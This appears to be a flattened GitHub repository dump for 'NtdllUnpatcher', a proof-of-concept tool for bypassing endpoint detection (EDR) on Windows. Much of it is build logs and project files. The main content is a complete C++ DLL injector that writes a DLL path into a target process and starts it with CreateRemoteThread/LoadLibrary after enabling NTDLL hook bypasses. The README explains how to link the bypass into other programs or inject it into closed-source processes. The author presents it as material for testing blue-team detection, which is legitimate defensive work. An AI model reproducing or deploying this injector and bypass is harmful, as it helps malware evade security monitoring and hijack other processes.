https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher/x64/Debug/NtdllUnpatcher.tlog/link.read.1.tlog -------------------------------------------------------------------------------- /NtdllUnpatcher/x64/Debug/NtdllUnpatcher.tlog/link.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher/x64/Debug/NtdllUnpatcher.tlog/link.write.1.tlog -------------------------------------------------------------------------------- /NtdllUnpatcher/x64/Debug/NtdllUnpatcher.tlog/unsuccessfulbuild: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher/x64/Debug/NtdllUnpatcher.tlog/unsuccessfulbuild -------------------------------------------------------------------------------- /NtdllUnpatcher/x64/Debug/stdafx.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher/x64/Debug/stdafx.obj -------------------------------------------------------------------------------- /NtdllUnpatcher/x64/Debug/vc141.idb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher/x64/Debug/vc141.idb -------------------------------------------------------------------------------- /NtdllUnpatcher/x64/Debug/vc141.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher/x64/Debug/vc141.pdb 
-------------------------------------------------------------------------------- /NtdllUnpatcher/x64/Release/NtdllUnpatcher.Build.CppClean.log: -------------------------------------------------------------------------------- 1 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher\x64\release\vc141.pdb 2 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher\x64\release\ntdllunpatcher.obj 3 | c:\users\devl\source\repos\ntdllunpatcher\x64\release\ntdllunpatcher.dll 4 | c:\users\devl\source\repos\ntdllunpatcher\x64\release\ntdllunpatcher.pdb 5 | c:\users\devl\source\repos\ntdllunpatcher\x64\release\ntdllunpatcher.lib 6 | c:\users\devl\source\repos\ntdllunpatcher\x64\release\ntdllunpatcher.exp 7 | c:\users\devl\source\repos\ntdllunpatcher\x64\release\ntdllunpatcher.ipdb 8 | c:\users\devl\source\repos\ntdllunpatcher\x64\release\ntdllunpatcher.iobj 9 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher\x64\release\ntdllunpatcher.tlog\cl.command.1.tlog 10 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher\x64\release\ntdllunpatcher.tlog\cl.read.1.tlog 11 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher\x64\release\ntdllunpatcher.tlog\cl.write.1.tlog 12 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher\x64\release\ntdllunpatcher.tlog\link.command.1.tlog 13 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher\x64\release\ntdllunpatcher.tlog\link.read.1.tlog 14 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher\x64\release\ntdllunpatcher.tlog\link.write.1.tlog 15 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher\x64\release\ntdllunpatcher.tlog\ntdllunpatcher.write.1u.tlog 16 | -------------------------------------------------------------------------------- /NtdllUnpatcher/x64/Release/NtdllUnpatcher.log: -------------------------------------------------------------------------------- 1 |  NtdllUnpatcher.cpp 2 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher\ntdllunpatcher.cpp(218): warning C4129: 'c': 
unrecognized character escape sequence 3 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher\ntdllunpatcher.cpp(218): warning C4129: 'w': unrecognized character escape sequence 4 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher\ntdllunpatcher.cpp(218): warning C4129: 's': unrecognized character escape sequence 5 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher\ntdllunpatcher.cpp(246): warning C4244: 'argument': conversion from 'LONGLONG' to 'DWORD', possible loss of data 6 | Creating library C:\Users\devl\source\repos\NtdllUnpatcher\x64\Release\NtdllUnpatcher.lib and object C:\Users\devl\source\repos\NtdllUnpatcher\x64\Release\NtdllUnpatcher.exp 7 | Generating code 8 | Finished generating code 9 | All 10 functions were compiled because no usable IPDB/IOBJ from previous compilation was found. 10 | NtdllUnpatcher.vcxproj -> C:\Users\devl\source\repos\NtdllUnpatcher\x64\Release\NtdllUnpatcher.dll 11 | -------------------------------------------------------------------------------- /NtdllUnpatcher/x64/Release/NtdllUnpatcher.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher/x64/Release/NtdllUnpatcher.obj -------------------------------------------------------------------------------- /NtdllUnpatcher/x64/Release/NtdllUnpatcher.tlog/CL.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher/x64/Release/NtdllUnpatcher.tlog/CL.command.1.tlog -------------------------------------------------------------------------------- /NtdllUnpatcher/x64/Release/NtdllUnpatcher.tlog/CL.read.1.tlog: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher/x64/Release/NtdllUnpatcher.tlog/CL.read.1.tlog -------------------------------------------------------------------------------- /NtdllUnpatcher/x64/Release/NtdllUnpatcher.tlog/CL.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher/x64/Release/NtdllUnpatcher.tlog/CL.write.1.tlog -------------------------------------------------------------------------------- /NtdllUnpatcher/x64/Release/NtdllUnpatcher.tlog/NtdllUnpatcher.lastbuildstate: -------------------------------------------------------------------------------- 1 | #TargetFrameworkVersion=v4.0:PlatformToolSet=v141:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=10.0.10240.0 2 | Release|x64|C:\Users\devl\source\repos\NtdllUnpatcher\| 3 | -------------------------------------------------------------------------------- /NtdllUnpatcher/x64/Release/NtdllUnpatcher.tlog/NtdllUnpatcher.write.1u.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher/x64/Release/NtdllUnpatcher.tlog/NtdllUnpatcher.write.1u.tlog -------------------------------------------------------------------------------- /NtdllUnpatcher/x64/Release/NtdllUnpatcher.tlog/link.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher/x64/Release/NtdllUnpatcher.tlog/link.command.1.tlog -------------------------------------------------------------------------------- /NtdllUnpatcher/x64/Release/NtdllUnpatcher.tlog/link.read.1.tlog: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher/x64/Release/NtdllUnpatcher.tlog/link.read.1.tlog -------------------------------------------------------------------------------- /NtdllUnpatcher/x64/Release/NtdllUnpatcher.tlog/link.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher/x64/Release/NtdllUnpatcher.tlog/link.write.1.tlog -------------------------------------------------------------------------------- /NtdllUnpatcher/x64/Release/vc141.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher/x64/Release/vc141.pdb -------------------------------------------------------------------------------- /NtdllUnpatcher_Injector/NtdllUnpatcher_Injector.cpp: -------------------------------------------------------------------------------- 1 | // NtdllUnpatcher_Injector.cpp : This file contains the 'main' function. Program execution begins and ends there. 
2 | // 3 | 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include "NtdllUnpatcher.h" 9 | #include 10 | 11 | BOOL Dll_Injection(TCHAR *dll_name, int processId) 12 | { 13 | TCHAR lpdllpath[MAX_PATH]; 14 | GetFullPathName(dll_name, MAX_PATH, lpdllpath, nullptr); 15 | /* this portion get it and puts it in the memory of the remote process */ 16 | // get size of the dll's path 17 | auto size = wcslen(lpdllpath) * sizeof(TCHAR); 18 | 19 | // open selected process 20 | auto hVictimProcess = OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE, 0, processId); 21 | if (hVictimProcess == NULL) // check if process open failed 22 | { 23 | return FALSE; 24 | } 25 | // allocate memory in the remote process 26 | auto pNameInVictimProcess = VirtualAllocEx(hVictimProcess, 27 | nullptr, 28 | size, 29 | MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 30 | if (pNameInVictimProcess == NULL) //Check if allocation failed 31 | { 32 | return FALSE; 33 | } 34 | // write the DLL to memory 35 | auto bStatus = WriteProcessMemory(hVictimProcess, 36 | pNameInVictimProcess, 37 | lpdllpath, 38 | size, 39 | nullptr); 40 | if (bStatus == 0) 41 | { 42 | return FALSE; 43 | } 44 | // gets a handle for kernel32dll's LoadLibrary call 45 | auto hKernel32 = GetModuleHandle(L"kernel32.dll"); 46 | if (hKernel32 == NULL) 47 | { 48 | return FALSE; 49 | } 50 | auto LoadLibraryAddress = GetProcAddress(hKernel32, "LoadLibraryW"); 51 | if (LoadLibraryAddress == NULL) 52 | { 53 | if ((LoadLibraryAddress = GetProcAddress(hKernel32, "LoadLibraryA")) == NULL) 54 | { 55 | return FALSE; 56 | } 57 | } 58 | 59 | // Using the above objects execute the DLL in the remote process 60 | auto hThreadId = CreateRemoteThread(hVictimProcess, 61 | NULL, 62 | 0, 63 | (LPTHREAD_START_ROUTINE)LoadLibraryAddress, 64 | pNameInVictimProcess, 65 | NULL, 66 | NULL); 67 | if (hThreadId == NULL) 68 | { 69 | return FALSE; 70 | } 71 | WaitForSingleObject(hThreadId, INFINITE); 72 | 73 | CloseHandle(hVictimProcess); 74 | 
VirtualFreeEx(hVictimProcess, pNameInVictimProcess, size, MEM_RELEASE); 75 | return TRUE; 76 | } 77 | 78 | int main(int argc, char* argv[]) 79 | { 80 | USES_CONVERSION; 81 | if (argc < 2) 82 | { 83 | printf_s("Usage: ./InjectProc.exe \nExample:\n\ 84 | ./InjectProc.exe path/to/dll.dll 655\n\ 85 | "); 86 | return EXIT_FAILURE; 87 | } 88 | __declspec(dllimport) BOOL InitializeHooks(); 89 | BOOL res = InitializeHooks(); 90 | if (!res) 91 | { 92 | return EXIT_FAILURE; 93 | } 94 | Dll_Injection(A2T(argv[1]), atoi(argv[2])); 95 | return EXIT_SUCCESS; 96 | } -------------------------------------------------------------------------------- /NtdllUnpatcher_Injector/NtdllUnpatcher_Injector.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 15.0 23 | {59AE6F00-7B3B-4A2F-852F-7D71C04E5B0D} 24 | Win32Proj 25 | NtdllUnpatcherInjector 26 | 10.0.17763.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v141 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v141 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v141 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v141 52 | true 53 | Unicode 54 | Static 55 | false 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | false 77 | 78 | 79 | true 80 | 81 | 82 | true 83 | 84 | 85 | false 86 | 87 | 88 | 89 | NotUsing 90 | Level3 91 | MaxSpeed 92 | true 93 | true 94 | true 95 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 96 | false 97 | pch.h 98 | ..\NtdllUnpatcher;%(AdditionalIncludeDirectories) 99 | 100 | 101 | Console 102 | true 103 | true 104 | true 105 | Advapi32.lib;..\x64\Release\NtdllUnpatcher.lib;..\Detours-master\lib.X64\detours.lib;%(AdditionalDependencies) 106 | true 107 | 108 | 109 | 110 | 111 | Use 112 | Level3 113 | Disabled 114 | true 115 | 
WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 116 | true 117 | pch.h 118 | 119 | 120 | Console 121 | true 122 | 123 | 124 | 125 | 126 | NotUsing 127 | Level3 128 | Disabled 129 | true 130 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 131 | true 132 | pch.h 133 | 134 | 135 | Console 136 | true 137 | 138 | 139 | 140 | 141 | Use 142 | Level3 143 | MaxSpeed 144 | true 145 | true 146 | true 147 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 148 | true 149 | pch.h 150 | 151 | 152 | Console 153 | true 154 | true 155 | true 156 | 157 | 158 | 159 | 160 | 161 | 162 | 163 | 164 | -------------------------------------------------------------------------------- /NtdllUnpatcher_Injector/NtdllUnpatcher_Injector.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /NtdllUnpatcher_Injector/NtdllUnpatcher_Injector.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | C:\Users\devl\source\repos\NtdllUnpatcher\x64\Release\NtdllUnpatcher.dll 3648 5 | WindowsLocalDebugger 6 | 7 | 8 | C:\Users\devl\source\repos\NtdllUnpatcher\x64\Release\NtdllUnpatcher.dll 980 9 | WindowsLocalDebugger 10 | 11 | -------------------------------------------------------------------------------- /NtdllUnpatcher_Injector/x64/Debug/NtdllUnp.59AE6F00.tlog/CL.command.1.tlog: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher_Injector/x64/Debug/NtdllUnp.59AE6F00.tlog/CL.command.1.tlog -------------------------------------------------------------------------------- /NtdllUnpatcher_Injector/x64/Debug/NtdllUnp.59AE6F00.tlog/CL.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher_Injector/x64/Debug/NtdllUnp.59AE6F00.tlog/CL.read.1.tlog -------------------------------------------------------------------------------- /NtdllUnpatcher_Injector/x64/Debug/NtdllUnp.59AE6F00.tlog/CL.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher_Injector/x64/Debug/NtdllUnp.59AE6F00.tlog/CL.write.1.tlog -------------------------------------------------------------------------------- /NtdllUnpatcher_Injector/x64/Debug/NtdllUnp.59AE6F00.tlog/NtdllUnpatcher_Injector.lastbuildstate: -------------------------------------------------------------------------------- 1 | #TargetFrameworkVersion=v4.0:PlatformToolSet=v141:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=10.0.17763.0 2 | Debug|x64|C:\Users\devl\source\repos\NtdllUnpatcher\| 3 | -------------------------------------------------------------------------------- /NtdllUnpatcher_Injector/x64/Debug/NtdllUnp.59AE6F00.tlog/link.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher_Injector/x64/Debug/NtdllUnp.59AE6F00.tlog/link.command.1.tlog -------------------------------------------------------------------------------- 
/NtdllUnpatcher_Injector/x64/Debug/NtdllUnp.59AE6F00.tlog/link.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher_Injector/x64/Debug/NtdllUnp.59AE6F00.tlog/link.read.1.tlog -------------------------------------------------------------------------------- /NtdllUnpatcher_Injector/x64/Debug/NtdllUnp.59AE6F00.tlog/link.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher_Injector/x64/Debug/NtdllUnp.59AE6F00.tlog/link.write.1.tlog -------------------------------------------------------------------------------- /NtdllUnpatcher_Injector/x64/Debug/NtdllUnpatcher_Injector.log: -------------------------------------------------------------------------------- 1 |  NtdllUnpatcher_Injector.cpp 2 | NtdllUnpatcher_Injector.vcxproj -> C:\Users\devl\source\repos\NtdllUnpatcher\x64\Debug\NtdllUnpatcher_Injector.exe 3 | -------------------------------------------------------------------------------- /NtdllUnpatcher_Injector/x64/Debug/NtdllUnpatcher_Injector.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher_Injector/x64/Debug/NtdllUnpatcher_Injector.obj -------------------------------------------------------------------------------- /NtdllUnpatcher_Injector/x64/Debug/vc141.idb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher_Injector/x64/Debug/vc141.idb -------------------------------------------------------------------------------- 
/README.md:
--------------------------------------------------------------------------------
# NtdllUnpatcher
Example code for EDR bypassing; please use this for testing blue team detection capabilities against this type of malware, which bypasses EDRs' userland hooks. The code is a bit spaghetti-like at the moment and serves only as a PoC. Not for malicious use.
Note that this particular code was tested on Windows 10 17763.

# How To Use
NtdllUnpatcher: This may be compiled as a .lib or .dll. It does the heavy work of loading an unhooked copy of NTDLL into memory and patching the currently hooked functions to redirect to their unhooked counterparts. To enable the bypass with any code you already have, simply compile with this .lib and call the InitializeHooks() routine. Otherwise this may be compiled as a .dll and injected into a closed-source program through the use of a loader. Note that the current project configurations are only set up for the x64 release build.

NtdllUnpatcher_Injector: This is a loader that will inject a DLL into a PID. This may be used to load NtdllUnpatcher.dll into a closed-source program to enable NTDLL hook bypasses for the targeted application. Usage is: NtdllUnpatcher_Injector . Currently the project configurations are only set up for the x64 release build.
--------------------------------------------------------------------------------